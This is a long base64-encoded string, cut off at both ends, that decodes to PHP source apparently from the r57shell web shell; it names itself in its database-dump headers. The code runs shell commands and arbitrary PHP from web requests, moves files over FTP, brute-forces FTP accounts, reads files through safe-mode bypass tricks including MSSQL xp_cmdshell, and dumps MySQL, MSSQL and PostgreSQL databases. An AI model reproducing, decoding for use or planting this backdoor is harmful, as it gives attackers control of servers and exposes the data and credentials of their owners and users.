PiAiLiRfUE9TVFsnbG9jX2ZpbGUnXS4iIjticmVhaztjYXNlIEdFVDokX1BPU1RbJ2NtZCddPXdoaWNoKCdHRVQnKS4iICIuJF9QT1NUWydyZW1fZmlsZSddLiIgPiAiLiRfUE9TVFsnbG9jX2ZpbGUnXS4iIjticmVhaztjYXNlIGN1cmw6JF9QT1NUWydjbWQnXT13aGljaCgnY3VybCcpLiIgIi4kX1BPU1RbJ3JlbV9maWxlJ10uIiAtbyAiLiRfUE9TVFsnbG9jX2ZpbGUnXS4iIjticmVhazt9fWlmKCFlbXB0eSgkX1BPU1RbJ2NtZCddKSAmJiAoJF9QT1NUWydjbWQnXT09ImZ0cF9maWxlX3VwIiB8fCAkX1BPU1RbJ2NtZCddPT0iZnRwX2ZpbGVfZG93biIpKXtsaXN0KCRmdHBfc2VydmVyLCRmdHBfcG9ydCk9c3BsaXQoIjoiLCRfUE9TVFsnZnRwX3NlcnZlcl9wb3J0J10pO2lmKGVtcHR5KCRmdHBfcG9ydCkpeyRmdHBfcG9ydD0yMSA7fSRjb25uZWN0aW9uPUBmdHBfY29ubmVjdCgkZnRwX3NlcnZlciwkZnRwX3BvcnQsMTAgKTtpZighJGNvbm5lY3Rpb24pe2ZlKCRsYW5ndWFnZSwwICk7fWVsc2Uge2lmKCFAZnRwX2xvZ2luKCRjb25uZWN0aW9uLCRfUE9TVFsnZnRwX2xvZ2luJ10sJF9QT1NUWydmdHBfcGFzc3dvcmQnXSkpe2ZlKCRsYW5ndWFnZSwxICk7fWVsc2Uge2lmKCRfUE9TVFsnY21kJ109PSJmdHBfZmlsZV9kb3duIil7aWYoY2hvcCgkX1BPU1RbJ2xvY19maWxlJ10pPT0kZGlyKXskX1BPU1RbJ2xvY19maWxlJ109JGRpci4oKCR3aW5kb3dzKT8oJ1xcJyk6KCcvJykpLmJhc2VuYW1lKCRfUE9TVFsnZnRwX2ZpbGUnXSk7fUBmdHBfZ2V0KCRjb25uZWN0aW9uLCRfUE9TVFsnbG9jX2ZpbGUnXSwkX1BPU1RbJ2Z0cF9maWxlJ10sJF9QT1NUWydtb2RlJ10pO31pZigkX1BPU1RbJ2NtZCddPT0iZnRwX2ZpbGVfdXAiKXtAZnRwX3B1dCgkY29ubmVjdGlvbiwkX1BPU1RbJ2Z0cF9maWxlJ10sJF9QT1NUWydsb2NfZmlsZSddLCRfUE9TVFsnbW9kZSddKTt9fX1AZnRwX2Nsb3NlKCRjb25uZWN0aW9uKTskX1BPU1RbJ2NtZCddPSIiO31pZighZW1wdHkoJF9QT1NUWydjbWQnXSkgJiYgJF9QT1NUWydjbWQnXT09ImZ0cF9icnV0ZSIpe2xpc3QoJGZ0cF9zZXJ2ZXIsJGZ0cF9wb3J0KT1zcGxpdCgiOiIsJF9QT1NUWydmdHBfc2VydmVyX3BvcnQnXSk7aWYoZW1wdHkoJGZ0cF9wb3J0KSl7JGZ0cF9wb3J0PTIxIDt9JGNvbm5lY3Rpb249QGZ0cF9jb25uZWN0KCRmdHBfc2VydmVyLCRmdHBfcG9ydCwxMCApO2lmKCEkY29ubmVjdGlvbil7ZmUoJGxhbmd1YWdlLDAgKTskX1BPU1RbJ2NtZCddPSIiO31lbHNlIGlmKCEkdXNlcnM9c2hlbGxfZ2V0X3VzZXJzKCkpe2VjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCBiZ2NvbG9yPSMwMDAwMDA+PHRyPjx0ZCBiZ2NvbG9yPSNjY2NjY2M+PGZvbnQgY29sb3I9cmVkIGZhY2U9VmVyZGFuYSBzaXplPS0yPjxkaXYgYWxpZ249Y2VudGVyPjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDk2J10uIjwvYj48L2Rpdj48L2ZvbnQ+PC90ZD48L3RyPjwvdGFibGU+IjskX1BPU1RbJ2NtZCddPSIiO31AZnRwX2Nsb3NlKCRjb25uZWN0aW9uKTt9ZWNobyAkdGFibGVfdXAzO2lmKGVtcHR5KCRfUE9TVFsnY21kJ10pICYmICEkc2FmZV9tb2RlKXskX1BPU1RbJ2NtZCddPSgkd2luZG93cyk/KCJkaXIiKTooImxzIC1saWEiKTt9ZWxzZSBpZihlbXB0eSgkX1BPU1RbJ2NtZCddKSAmJiAkc2FmZV9tb2RlKXskX1BPU1RbJ2NtZCddPSJzYWZlX2RpciI7fWVjaG8gJGZvbnQuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDEnXS4iOiA8Yj4iLiRfUE9TVFsnY21kJ10uIjwvYj48L2ZvbnQ+PC90ZD48L3RyPjx0cj48dGQ+PGI+PGRpdiBhbGlnbj1jZW50ZXI+IjtpZighJHNhZmVfbW9kZSB8fCAkX1BPU1RbJ2NtZCddIT0ic2FmZV9kaXIiKXtlY2hvICI8dGV4dGFyZWEgbmFtZT1yZXBvcnQgY29scz0xMjEgcm93cz0xNT4iO31pZigkc2FmZV9tb2RlKXtzd2l0Y2goJF9QT1NUWydjbWQnXSl7Y2FzZSAnc2FmZV9kaXInOiRkPUBkaXIoJGRpcik7aWYoJGQpeyRhcnJEaXJzPWFycmF5KCk7JGFyckZpbGVzPWFycmF5KCk7JGFyckNudD0wIDt3aGlsZShmYWxzZSE9PSgkZmlsZT0kZC0+cmVhZCgpKSl7aWYoJGZpbGU9PSIuIiljb250aW51ZTtAY2xlYXJzdGF0Y2FjaGUoKTtsaXN0KCRkZXYsJGlub2RlLCRpbm9kZXAsJG5saW5rLCR1aWQsJGdpZCwkaW5vZGV2LCRzaXplLCRhdGltZSwkbXRpbWUsJGN0aW1lLCRic2l6ZSk9c3RhdCgkZmlsZSk7aWYoJHdpbmRvd3Mpe2lmKEBpc19kaXIoJGZpbGUpKXskYXJyRGlyc1skZmlsZV1bJ3R5cGUnXT0iZGlyIjskYXJyRGlyc1skZmlsZV1bJ3Blcm1pcyddPSIiOyRhcnJEaXJzWyRmaWxlXVsnZGF0ZSddPWRhdGUoImQubS5ZIEg6aSIsJG10aW1lKTskYXJyRGlyc1skZmlsZV1bJ3NpemUnXT0iICA8RElSPiI7JGFyckRpcnNbJGZpbGVdWyduYW1lJ109JGZpbGU7fWVsc2UgeyRhcnJGaWxlc1skZmlsZV1bJ3R5cGUnXT0iZmlsZSI7JGFyckZpbGVzWyRmaWxlXVsncGVybWlzJ109IiI7JGFyckZpbGVzWyRmaWxlXVsnZGF0ZSddPWRhdGUoImQubS5ZIEg6aSIsJG10aW1lKTskYXJyRmlsZXNbJGZpbGVdWydzaXplJ109c3ByaW50ZigiJTdzIiwkc2l6ZSk7JGFyckZpbGVzWyRmaWxlXVsnbmFtZSddPSRmaWxlO319ZWxzZSB7aWYoQGlzX2RpcigkZmlsZSkpeyRhcnJEaXJzWyRmaWxlXVsndHlwZSddPSJkaXIiOyRhcnJEaXJzWyRmaWxlXVsncGVybWlzJ109cGVybXMoQGZpbGVwZXJtcygkZmlsZSkpOyRhcnJEaXJzWyRmaWxlXVsnZGF0ZSddPWRhdGUoImQubS5ZIEg6aSIsJG10aW1lKTskYXJyRGlyc1skZmlsZV1bJ3NpemUnXT1zcHJpbnRmKCIlOXMgJTdzIiwkdWlkLiIvIi4kZ2lkLCRzaXplKTskYXJyRGlyc1skZmlsZV1bJ25hbWUnXT0kZmlsZTt9ZWxzZSB7JGFyckZpbGVzWyRmaWxlXVsndHlwZSddPSJmaWxlIjskYXJyRmlsZXNbJGZpbGVdWydwZXJtaXMnXT1wZXJtcyhAZmlsZXBlcm1zKCRmaWxlKSk7JGFyckZpbGVzWyRmaWxlXVsnZGF0ZSddPWRhdGUoImQubS5ZIEg6aSIsJG10aW1lKTskYXJyRmlsZXNbJGZpbGVdWydzaXplJ109c3ByaW50ZigiJTlzICU3cyIsJHVpZC4iLyIuJGdpZCwkc2l6ZSk7JGFyckZpbGVzWyRmaWxlXVsnbmFtZSddPSRmaWxlO319JGFyckNudCsrO30kZC0+Y2xvc2UoKTtrc29ydCgkYXJyRGlycyk7a3NvcnQoJGFyckZpbGVzKTskYXJyRGlyc0FuZEZpbGVzPWFycmF5X21lcmdlKCRhcnJEaXJzLCRhcnJGaWxlcyk7fWVsc2Uge2VjaG8gJGxhbmdbJGxhbmd1YWdlLl90ZXh0MjldO31icmVhaztjYXNlICdzYWZlX2ZpbGUnOmlmKEBpc19maWxlKCRfUE9TVFsnZmlsZSddKSl7JGZpbGU9QGZpbGUoJF9QT1NUWydmaWxlJ10pO2lmKCRmaWxlKXskYz1Ac2l6ZW9mKCRmaWxlKTtmb3IoJGk9MCA7JGk8JGM7JGkrKyl7ZWNobyBodG1sc3BlY2lhbGNoYXJzKCRmaWxlWyRpXSk7fX1lbHNlIHtlY2hvICRsYW5nWyRsYW5ndWFnZS5fdGV4dDI5XTt9fWVsc2Uge2VjaG8gJGxhbmdbJGxhbmd1YWdlLl90ZXh0MzFdO31icmVhaztjYXNlICd0ZXN0MSc6JGNpPUBjdXJsX2luaXQoImZpbGU6Ly8iLiRfUE9TVFsndGVzdDFfZmlsZSddLiIiKTskY2Y9QGN1cmxfZXhlYygkY2kpO2VjaG8gJGNmO2JyZWFrO2Nhc2UgJ3Rlc3QyJzpAaW5jbHVkZSAoJF9QT1NUWyd0ZXN0Ml9maWxlJ10pO2JyZWFrO2Nhc2UgJ3Rlc3QzJzppZighaXNzZXQoJF9QT1NUWyd0ZXN0M19wb3J0J10pIHx8IGVtcHR5KCRfUE9TVFsndGVzdDNfcG9ydCddKSl7JF9QT1NUWyd0ZXN0M19wb3J0J109IjMzMDYiO30kZGI9QG15c3FsX2Nvbm5lY3QoJ2xvY2FsaG9zdDonLiRfUE9TVFsndGVzdDNfcG9ydCddLCRfUE9TVFsndGVzdDNfbWwnXSwkX1BPU1RbJ3Rlc3QzX21wJ10pO2lmKCRkYil7aWYoQG15c3FsX3NlbGVjdF9kYigkX1BPU1RbJ3Rlc3QzX21kJ10sJGRiKSl7JHNxbD0iRFJPUCBUQUJMRSBJRiBFWElTVFMgdGVtcF9yNTdfdGFibGU7IjtAbXlzcWxfcXVlcnkoJHNxbCk7JHNxbD0iQ1JFQVRFIFRBQkxFIGB0ZW1wX3I1N190YWJsZWAgKCBgZmlsZWAgTE9OR0JMT0IgTk9UIE5VTEwgKTsiO0BteXNxbF9xdWVyeSgkc3FsKTskc3FsPSJMT0FEIERBVEEgSU5GSUxFIFwiIi4kX1BPU1RbJ3Rlc3QzX2ZpbGUnXS4iXCIgSU5UTyBUQUJMRSB0ZW1wX3I1N190YWJsZTsiO0BteXNxbF9xdWVyeSgkc3FsKTskc3FsPSJTRUxFQ1QgKiBGUk9NIHRlbXBfcjU3X3RhYmxlOyI7JHI9QG15c3FsX3F1ZXJ5KCRzcWwpO3doaWxlKCgkcl9zcWw9QG15c3FsX2ZldGNoX2FycmF5KCRyKSkpe2VjaG8gQGh0bWxzcGVjaWFsY2hhcnMoJHJfc3FsWzAgXSk7fSRzcWw9IkRST1AgVEFCTEUgSUYgRVhJU1RTIHRlbXBfcjU3X3RhYmxlOyI7QG15c3FsX3F1ZXJ5KCRzcWwpO31lbHNlIGVjaG8gIlstXSBFUlJPUiEgQ2FuJ3Qgc2VsZWN0IGRhdGFiYXNlIjtAbXlzcWxfY2xvc2UoJGRiKTt9ZWxzZSBlY2hvICJbLV0gRVJST1IhIENhbid0IGNvbm5lY3QgdG8gbXlzcWwgc2VydmVyIjticmVhaztjYXNlICd0ZXN0NCc6aWYoIWlzc2V0KCRfUE9TVFsndGVzdDRfcG9ydCddKSB8fCBlbXB0eSgkX1BPU1RbJ3Rlc3Q0X3BvcnQnXSkpeyRfUE9TVFsndGVzdDRfcG9ydCddPSIxNDMzIjt9JGRiPUBtc3NxbF9jb25uZWN0KCdsb2NhbGhvc3QsJy4kX1BPU1RbJ3Rlc3Q0X3BvcnQnXSwkX1BPU1RbJ3Rlc3Q0X21sJ10sJF9QT1NUWyd0ZXN0NF9tcCddKTtpZigkZGIpe2lmKEBtc3NxbF9zZWxlY3RfZGIoJF9QT1NUWyd0ZXN0NF9tZCddLCRkYikpe0Btc3NxbF9xdWVyeSgiZHJvcCB0YWJsZSByNTdfdGVtcF90YWJsZSIsJGRiKTtAbXNzcWxfcXVlcnkoImNyZWF0ZSB0YWJsZSByNTdfdGVtcF90YWJsZSAoIHN0cmluZyBWQVJDSEFSICg1MDApIE5VTEwpIiwkZGIpO0Btc3NxbF9xdWVyeSgiaW5zZXJ0IGludG8gcjU3X3RlbXBfdGFibGUgRVhFQyBtYXN0ZXIuZGJvLnhwX2NtZHNoZWxsICciLiRfUE9TVFsndGVzdDRfZmlsZSddLiInIiwkZGIpOyRyZXM9bXNzcWxfcXVlcnkoInNlbGVjdCAqIGZyb20gcjU3X3RlbXBfdGFibGUiLCRkYik7d2hpbGUoKCRyb3c9QG1zc3FsX2ZldGNoX3JvdygkcmVzKSkpe2VjaG8gJHJvd1swIF0uIlxyXG4iO31AbXNzcWxfcXVlcnkoImRyb3AgdGFibGUgcjU3X3RlbXBfdGFibGUiLCRkYik7fWVsc2UgZWNobyAiWy1dIEVSUk9SISBDYW4ndCBzZWxlY3QgZGF0YWJhc2UiO0Btc3NxbF9jbG9zZSgkZGIpO31lbHNlIGVjaG8gIlstXSBFUlJPUiEgQ2FuJ3QgY29ubmVjdCB0byBNU1NRTCBzZXJ2ZXIiO2JyZWFrO319ZWxzZSBpZigoJF9QT1NUWydjbWQnXSE9InBocF9ldmFsIikgJiYgKCRfUE9TVFsnY21kJ10hPSJteXNxbF9kdW1wIikgJiYgKCRfUE9TVFsnY21kJ10hPSJkYl9zaG93IikgJiYgKCRfUE9TVFsnY21kJ10hPSJkYl9xdWVyeSIpICYmICgkX1BPU1RbJ2NtZCddIT0iZnRwX2JydXRlIikpeyRjbWRfcmVwPWV4KCRfUE9TVFsnY21kJ10pO2lmKCR3aW5kb3dzKXtlY2hvIEBodG1sc3BlY2lhbGNoYXJzKEBjb252ZXJ0X2N5cl9zdHJpbmcoJGNtZF9yZXAsJ2QnLCd3JykpLiJcbiI7fWVsc2Uge2VjaG8gQGh0bWxzcGVjaWFsY2hhcnMoJGNtZF9yZXApLiJcbiI7fX1pZigkX1BPU1RbJ2NtZCddPT0iZnRwX2JydXRlIil7JHN1Yz0wIDtmb3JlYWNoKCR1c2VycyBhcyAkdXNlcil7JGNvbm5lY3Rpb249QGZ0cF9jb25uZWN0KCRmdHBfc2VydmVyLCRmdHBfcG9ydCwxMCApO2lmKEBmdHBfbG9naW4oJGNvbm5lY3Rpb24sJHVzZXIsJHVzZXIpKXtlY2hvICJbK10gJHVzZXI6JHVzZXIgLSBzdWNjZXNzXHJcbiI7JHN1YysrO31lbHNlIGlmKGlzc2V0KCRfUE9TVFsncmV2ZXJzZSddKSl7aWYoQGZ0cF9sb2dpbigkY29ubmVjdGlvbiwkdXNlcixzdHJyZXYoJHVzZXIpKSl7ZWNobyAiWytdICR1c2VyOiIuc3RycmV2KCR1c2VyKS4iIC0gc3VjY2Vzc1xyXG4iOyRzdWMrKzt9fUBmdHBfY2xvc2UoJGNvbm5lY3Rpb24pO31lY2hvICJcclxuLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxyXG4iOyRjb3VudD1jb3VudCgkdXNlcnMpO2lmKGlzc2V0KCRfUE9TVFsncmV2ZXJzZSddKSl7JGNvdW50Kj0yIDt9ZWNobyAkbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0OTcnXS4kY291bnQuIlxyXG4iO2VjaG8gJGxhbmdbJGxhbmd1YWdlLidfdGV4dDk4J10uJHN1Yy4iXHJcbiI7fWlmKCRfUE9TVFsnY21kJ109PSJwaHBfZXZhbCIpeyRldmFsPUBzdHJfcmVwbGFjZSgiPD8iLCIiLCRfUE9TVFsncGhwX2V2YWwnXSk7JGV2YWw9QHN0cl9yZXBsYWNlKCI/PiIsIiIsJGV2YWwpO0BldmFsKCRldmFsKTt9aWYoJF9QT1NUWydjbWQnXT09ImRiX3Nob3ciKXtzd2l0Y2goJF9QT1NUWydkYiddKXtjYXNlICdNeVNRTCc6aWYoZW1wdHkoJF9QT1NUWydkYl9wb3J0J10pKXskX1BPU1RbJ2RiX3BvcnQnXT0nMzMwNic7fSRkYj1AbXlzcWxfY29ubmVjdCgnbG9jYWxob3N0OicuJF9QT1NUWydkYl9wb3J0J10sJF9QT1NUWydteXNxbF9sJ10sJF9QT1NUWydteXNxbF9wJ10pO2lmKCRkYil7JHJlcz1AbXlzcWxfcXVlcnkoIlNIT1cgREFUQUJBU0VTIiwkZGIpO3doaWxlKCgkcm93PUBteXNxbF9mZXRjaF9yb3coJHJlcykpKXtlY2hvICJbK10gIi4kcm93WzAgXS4iXHJcbiI7aWYoaXNzZXQoJF9QT1NUWydzdCddKSl7JHJlczI9QG15c3FsX3F1ZXJ5KCJTSE9XIFRBQkxFUyBGUk9NICIuJHJvd1swIF0sJGRiKTt3aGlsZSgoJHJvdzI9QG15c3FsX2ZldGNoX3JvdygkcmVzMikpKXtlY2hvICIgfCAtICIuJHJvdzJbMCBdLiJcclxuIjtpZihpc3NldCgkX1BPU1RbJ3NjJ10pKXskcmVzMz1AbXlzcWxfcXVlcnkoIlNIT1cgQ09MVU1OUyBGUk9NICIuJHJvd1swIF0uIi4iLiRyb3cyWzAgXSwkZGIpO3doaWxlKCgkcm93Mz1AbXlzcWxfZmV0Y2hfcm93KCRyZXMzKSkpe2VjaG8gIiAgIHwgLSAiLiRyb3czWzAgXS4iXHJcbiI7fX19fX1AbXlzcWxfY2xvc2UoJGRiKTt9ZWxzZSBlY2hvICJbLV0gRVJST1IhIENhbid0IGNvbm5lY3QgdG8gTXlTUUwgc2VydmVyIjticmVhaztjYXNlICdNU1NRTCc6aWYoZW1wdHkoJF9QT1NUWydkYl9wb3J0J10pKXskX1BPU1RbJ2RiX3BvcnQnXT0nMTQzMyc7fSRkYj1AbXNzcWxfY29ubmVjdCgnbG9jYWxob3N0LCcuJF9QT1NUWydkYl9wb3J0J10sJF9QT1NUWydteXNxbF9sJ10sJF9QT1NUWydteXNxbF9wJ10pO2lmKCRkYil7JHJlcz1AbXNzcWxfcXVlcnkoInNwX2RhdGFiYXNlcyIsJGRiKTt3aGlsZSgoJHJvdz1AbXNzcWxfZmV0Y2hfcm93KCRyZXMpKSl7ZWNobyAiWytdICIuJHJvd1swIF0uIlxyXG4iO2lmKGlzc2V0KCRfUE9TVFsnc3QnXSkpe0Btc3NxbF9zZWxlY3RfZGIoJHJvd1swIF0pOyRyZXMyPUBtc3NxbF9xdWVyeSgic3BfdGFibGVzIiwkZGIpO3doaWxlKCgkcm93Mj1AbXNzcWxfZmV0Y2hfYXJyYXkoJHJlczIpKSl7aWYoJHJvdzJbJ1RBQkxFX1RZUEUnXT09J1RBQkxFJyAmJiAkcm93MlsnVEFCTEVfTkFNRSddIT0nZHRwcm9wZXJ0aWVzJyl7ZWNobyAiIHwgLSAiLiRyb3cyWydUQUJMRV9OQU1FJ10uIlxyXG4iO2lmKGlzc2V0KCRfUE9TVFsnc2MnXSkpeyRyZXMzPUBtc3NxbF9xdWVyeSgic3BfY29sdW1ucyAiLiRyb3cyWzIgXSwkZGIpO3doaWxlKCgkcm93Mz1AbXNzcWxfZmV0Y2hfYXJyYXkoJHJlczMpKSl7ZWNobyAiICAgfCAtICIuJHJvdzNbJ0NPTFVNTl9OQU1FJ10uIlxyXG4iO319fX19fUBtc3NxbF9jbG9zZSgkZGIpO31lbHNlIGVjaG8gIlstXSBFUlJPUiEgQ2FuJ3QgY29ubmVjdCB0byBNU1NRTCBzZXJ2ZXIiO2JyZWFrO2Nhc2UgJ1Bvc3RncmVTUUwnOmlmKGVtcHR5KCRfUE9TVFsnZGJfcG9ydCddKSl7JF9QT1NUWydkYl9wb3J0J109JzU0MzInO30kc3RyPSJob3N0PSdsb2NhbGhvc3QnIHBvcnQ9JyIuJF9QT1NUWydkYl9wb3J0J10uIicgdXNlcj0nIi4kX1BPU1RbJ215c3FsX2wnXS4iJyBwYXNzd29yZD0nIi4kX1BPU1RbJ215c3FsX3AnXS4iJyBkYm5hbWU9JyIuJF9QT1NUWydteXNxbF9kYiddLiInIjskZGI9QHBnX2Nvbm5lY3QoJHN0cik7aWYoJGRiKXskcmVzPUBwZ19xdWVyeSgkZGIsIlNFTEVDVCBkYXRuYW1lIEZST00gcGdfZGF0YWJhc2UgV0hFUkUgZGF0aXN0ZW1wbGF0ZT0nZiciKTt3aGlsZSgoJHJvdz1AcGdfZmV0Y2hfcm93KCRyZXMpKSl7ZWNobyAiWytdICIuJHJvd1swIF0uIlxyXG4iO31AcGdfY2xvc2UoJGRiKTt9ZWxzZSBlY2hvICJbLV0gRVJST1IhIENhbid0IGNvbm5lY3QgdG8gUG9zdGdyZVNRTCBzZXJ2ZXIiO2JyZWFrO319aWYoJF9QT1NUWydjbWQnXT09Im15c3FsX2R1bXAiKXtpZihpc3NldCgkX1BPU1RbJ2RpZiddKSl7JGZwPUBmb3BlbigkX1BPU1RbJ2RpZl9uYW1lJ10sInciKTt9aWYoKCFlbXB0eSgkX1BPU1RbJ2RpZiddKSAmJiAkZnApIHx8IChlbXB0eSgkX1BPU1RbJ2RpZiddKSkpeyRzcWg9IiMgaG9tZXBhZ2U6IGh0dHA6Ly9yc3Qudm9pZC5ydVxyXG4iOyRzcWguPSIjIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxyXG4iOyRzcWguPSIjICAgICBkYXRlIDogIi5kYXRlKCJqIEYgWSBnOmkiKS4iXHJcbiI7JHNxaC49IiMgZGF0YWJhc2UgOiAiLiRfUE9TVFsnbXlzcWxfZGInXS4iXHJcbiI7JHNxaC49IiMgICAgdGFibGUgOiAiLiRfUE9TVFsnbXlzcWxfdGJsJ10uIlxyXG4iOyRzcWguPSIjIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxyXG5cclxuIjtzd2l0Y2goJF9QT1NUWydkYiddKXtjYXNlICdNeVNRTCc6aWYoZW1wdHkoJF9QT1NUWydkYl9wb3J0J10pKXskX1BPU1RbJ2RiX3BvcnQnXT0nMzMwNic7fSRkYj1AbXlzcWxfY29ubmVjdCgnbG9jYWxob3N0OicuJF9QT1NUWydkYl9wb3J0J10sJF9QT1NUWydteXNxbF9sJ10sJF9QT1NUWydteXNxbF9wJ10pO2lmKCRkYil7aWYoQG15c3FsX3NlbGVjdF9kYigkX1BPU1RbJ215c3FsX2RiJ10sJGRiKSl7JHNxbDE9IiMgTXlTUUwgZHVtcCBjcmVhdGVkIGJ5IHI1N3NoZWxsXHJcbiI7JHNxbDEuPSRzcWg7JHJlcz1AbXlzcWxfcXVlcnkoIlNIT1cgQ1JFQVRFIFRBQkxFIGAiLiRfUE9TVFsnbXlzcWxfdGJsJ10uImAiLCRkYik7JHJvdz1AbXlzcWxfZmV0Y2hfcm93KCRyZXMpOyRzcWwxLj0kcm93WzEgXS4iXHJcblxyXG4iOyRzcWwxLj0iIyAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cclxuXHJcbiI7JHNxbDI9Jyc7JHJlcz1AbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gYCIuJF9QT1NUWydteXNxbF90YmwnXS4iYCIsJGRiKTtpZihAbXlzcWxfbnVtX3Jvd3MoJHJlcyk+MCApe3doaWxlKCgkcm93PUBteXNxbF9mZXRjaF9hc3NvYygkcmVzKSkpeyRrZXlzPUBpbXBsb2RlKCJgLCBgIixAYXJyYXlfa2V5cygkcm93KSk7JHZhbHVlcz1AYXJyYXlfdmFsdWVzKCRyb3cpO2ZvcmVhY2goJHZhbHVlcyBhcyAkaz0+JHYpeyR2YWx1ZXNbJGtdPWFkZHNsYXNoZXMoJHYpO30kdmFsdWVzPUBpbXBsb2RlKCInLCAnIiwkdmFsdWVzKTskc3FsMi49IklOU0VSVCBJTlRPIGAiLiRfUE9TVFsnbXlzcWxfdGJsJ10uImAgKGAiLiRrZXlzLiJgKSBWQUxVRVMgKCciLmh0bWxzcGVjaWFsY2hhcnMoJHZhbHVlcykuIicpO1xyXG4iO30kc3FsMi49IlxyXG4jIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSI7fWlmKCFlbXB0eSgkX1BPU1RbJ2RpZiddKSAmJiAkZnApe0BmcHV0cygkZnAsJHNxbDEuJHNxbDIpO31lbHNlIHtlY2hvICRzcWwxLiRzcWwyO319ZWxzZSBlY2hvICJbLV0gRVJST1IhIENhbid0IHNlbGVjdCBkYXRhYmFzZSI7QG15c3FsX2Nsb3NlKCRkYik7fWVsc2UgZWNobyAiWy1dIEVSUk9SISBDYW4ndCBjb25uZWN0IHRvIE15U1FMIHNlcnZlciI7YnJlYWs7Y2FzZSAnTVNTUUwnOmlmKGVtcHR5KCRfUE9TVFsnZGJfcG9ydCddKSl7JF9QT1NUWydkYl9wb3J0J109JzE0MzMnO30kZGI9QG1zc3FsX2Nvbm5lY3QoJ2xvY2FsaG9zdCwnLiRfUE9TVFsnZGJfcG9ydCddLCRfUE9TVFsnbXlzcWxfbCddLCRfUE9TVFsnbXlzcWxfcCddKTtpZigkZGIpe2lmKEBtc3NxbF9zZWxlY3RfZGIoJF9QT1NUWydteXNxbF9kYiddLCRkYikpeyRzcWwxPSIjIE1TU1FMIGR1bXAgY3JlYXRlZCBieSByNTdzaGVsbFxyXG4iOyRzcWwxLj0kc3FoOyRzcWwyPScnOyRyZXM9QG1zc3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NICIuJF9QT1NUWydteXNxbF90YmwnXS4iIiwkZGIpO2lmKEBtc3NxbF9udW1fcm93cygkcmVzKT4wICl7d2hpbGUoKCRyb3c9QG1zc3FsX2ZldGNoX2Fzc29jKCRyZXMpKSl7JGtleXM9QGltcGxvZGUoIiwgIixAYXJyYXlfa2V5cygkcm93KSk7JHZhbHVlcz1AYXJyYXlfdmFsdWVzKCRyb3cpO2ZvcmVhY2goJHZhbHVlcyBhcyAkaz0+JHYpeyR2YWx1ZXNbJGtdPWFkZHNsYXNoZXMoJHYpO30kdmFsdWVzPUBpbXBsb2RlKCInLCAnIiwkdmFsdWVzKTskc3FsMi49IklOU0VSVCBJTlRPICIuJF9QT1NUWydteXNxbF90YmwnXS4iICgiLiRrZXlzLiIpIFZBTFVFUyAoJyIuaHRtbHNwZWNpYWxjaGFycygkdmFsdWVzKS4iJyk7XHJcbiI7fSRzcWwyLj0iXHJcbiMgLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tIjt9aWYoIWVtcHR5KCRfUE9TVFsnZGlmJ10pICYmICRmcCl7QGZwdXRzKCRmcCwkc3FsMS4kc3FsMik7fWVsc2Uge2VjaG8gJHNxbDEuJHNxbDI7fX1lbHNlIGVjaG8gIlstXSBFUlJPUiEgQ2FuJ3Qgc2VsZWN0IGRhdGFiYXNlIjtAbXNzcWxfY2xvc2UoJGRiKTt9ZWxzZSBlY2hvICJbLV0gRVJST1IhIENhbid0IGNvbm5lY3QgdG8gTVNTUUwgc2VydmVyIjticmVhaztjYXNlICdQb3N0Z3JlU1FMJzppZihlbXB0eSgkX1BPU1RbJ2RiX3BvcnQnXSkpeyRfUE9TVFsnZGJfcG9ydCddPSc1NDMyJzt9JHN0cj0iaG9zdD0nbG9jYWxob3N0JyBwb3J0PSciLiRfUE9TVFsnZGJfcG9ydCddLiInIHVzZXI9JyIuJF9QT1NUWydteXNxbF9sJ10uIicgcGFzc3dvcmQ9JyIuJF9QT1NUWydteXNxbF9wJ10uIicgZGJuYW1lPSciLiRfUE9TVFsnbXlzcWxfZGInXS4iJyI7JGRiPUBwZ19jb25uZWN0KCRzdHIpO2lmKCRkYil7JHNxbDE9IiMgUG9zdGdyZVNRTCBkdW1wIGNyZWF0ZWQgYnkgcjU3c2hlbGxcclxuIjskc3FsMS49JHNxaDskc3FsMj0nJzskcmVzPUBwZ19xdWVyeSgkZGIsIlNFTEVDVCAqIEZST00gIi4kX1BPU1RbJ215c3FsX3RibCddLiIiKTtpZihAcGdfbnVtX3Jvd3MoJHJlcyk+MCApe3doaWxlKCgkcm93PUBwZ19mZXRjaF9hc3NvYygkcmVzKSkpeyRrZXlzPUBpbXBsb2RlKCIsICIsQGFycmF5X2tleXMoJHJvdykpOyR2YWx1ZXM9QGFycmF5X3ZhbHVlcygkcm93KTtmb3JlYWNoKCR2YWx1ZXMgYXMgJGs9PiR2KXskdmFsdWVzWyRrXT1hZGRzbGFzaGVzKCR2KTt9JHZhbHVlcz1AaW1wbG9kZSgiJywgJyIsJHZhbHVlcyk7JHNxbDIuPSJJTlNFUlQgSU5UTyAiLiRfUE9TVFsnbXlzcWxfdGJsJ10uIiAoIi4ka2V5cy4iKSBWQUxVRVMgKCciLmh0bWxzcGVjaWFsY2hhcnMoJHZhbHVlcykuIicpO1xyXG4iO30kc3FsMi49IlxyXG4jIC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSI7fWlmKCFlbXB0eSgkX1BPU1RbJ2RpZiddKSAmJiAkZnApe0BmcHV0cygkZnAsJHNxbDEuJHNxbDIpO31lbHNlIHtlY2hvICRzcWwxLiRzcWwyO31AcGdfY2xvc2UoJGRiKTt9ZWxzZSBlY2hvICJbLV0gRVJST1IhIENhbid0IGNvbm5lY3QgdG8gUG9zdGdyZVNRTCBzZXJ2ZXIiO2JyZWFrO319ZWxzZSBpZighZW1wdHkoJF9QT1NUWydkaWYnXSkgJiYgISRmcCl7ZWNobyAiWy1dIEVSUk9SISBDYW4ndCB3cml0ZSBpbiBkdW1wIGZpbGUiO319aWYoISR